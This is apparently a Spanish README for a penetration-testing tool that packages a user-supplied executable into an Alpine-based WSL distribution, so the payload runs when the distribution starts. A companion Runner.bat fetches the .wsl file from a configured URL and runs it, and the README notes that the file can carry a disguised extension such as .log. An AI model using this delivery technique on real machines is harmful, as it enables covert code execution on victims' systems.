
Un potente script de shell para crear distribuciones personalizadas de WSL (Subsistema de Windows para Linux) con payloads integrados.
Esta herramienta está pensada para la investigación legítima de seguridad y las pruebas de penetración. Los usuarios son responsables de asegurarse de contar con la autorización adecuada antes de probar sistemas que no poseen o para los que no tienen permiso explícito.
Un script de shell para crear distribuciones mínimas de WSL (Subsistema de Windows para Linux) con payloads integrados. Esta herramienta automatiza el proceso de creación de distribuciones WSL basadas en Alpine Linux que pueden ejecutar payloads personalizados al iniciarse.
El script Build_WSL_Payload.sh descarga el rootfs más reciente de Alpine Linux, lo personaliza para su uso con WSL, integra un ejecutable especificado por el usuario y empaqueta todo en un archivo .wsl distribuible.
El Runner.bat descargará el archivo de configuración de WSL desde la URL proporcionada y lo ejecutará (instalará WSL si no está presente y se dispone de derechos de administrador).
Esto es especialmente útil para pruebas de penetración, investigación de seguridad y creación de entornos WSL personalizados.
-N, --name: Especifica el nombre de distribución predeterminado para WSL-P, --payload: Especifica la ruta al archivo ejecutable del payload-H, --help: Muestra el menú de ayuda# Crear una distribución WSL llamada "CalcWSL" con un payload personalizado
./Build_WSL_Payload.sh -N CalcWSL -P ./Calc.exe
Opción 1. Doble clic - Al hacer doble clic en el archivo WSL se ejecutará el payload, pero también se abrirá un símbolo del sistema que deberá cerrarse manualmente. (No recomendado)
Opción 2. Usar el archivo Runner.bat
C:\Users\USER_NAME> .\Runner.bat
El script Runner.bat automáticamente:
Edite las variables al inicio de Runner.bat para personalizar:
set "DOWNLOAD_URL=https://your-server.com/payload.wsl"
set "WSL_FILE=payload.log" # Still testing but can use most file extensions here.
Este proyecto se inspiró y se basa en la investigación y las técnicas documentadas en el repositorio dmcxblue/WSL-Payloads, que proporciona información valiosa sobre la weaponización del formato de archivo WSL y la investigación de seguridad.
Licencia MIT
Se concede por la presente permiso, de forma gratuita, a cualquier persona que obtenga una copia de este software y de los archivos de documentación asociados (el "Software"), para tratar con el Software sin restricción, incluidos, entre otros, los derechos de usar, copiar, modificar, fusionar, publicar, distribuir, sublicenciar y/o vender copias del Software, y para permitir a las personas a quienes se les proporcione el Software hacer lo mismo, sujeto a las siguientes condiciones:
El aviso de copyright anterior y este aviso de permiso deberán incluirse en todas las copias o partes sustanciales del Software.
EL SOFTWARE SE PROPORCIONA "TAL CUAL", SIN GARANTÍA DE NINGÚN TIPO, EXPRESA O IMPLÍCITA, INCLUIDAS, ENTRE OTRAS, LAS GARANTÍAS DE COMERCIABILIDAD, IDONEIDAD PARA UN FIN PARTICULAR Y NO INFRACCIÓN. EN NINGÚN CASO LOS AUTORES O TITULARES DEL COPYRIGHT SERÁN RESPONSABLES DE CUALQUIER RECLAMO, DAÑO U OTRA RESPONSABILIDAD, YA SEA EN UNA ACCIÓN DE CONTRATO, AGRAVIO O DE OTRO MODO, QUE SURJA DE, O EN RELACIÓN CON EL SOFTWARE O EL USO U OTROS TRATOS EN EL SOFTWARE.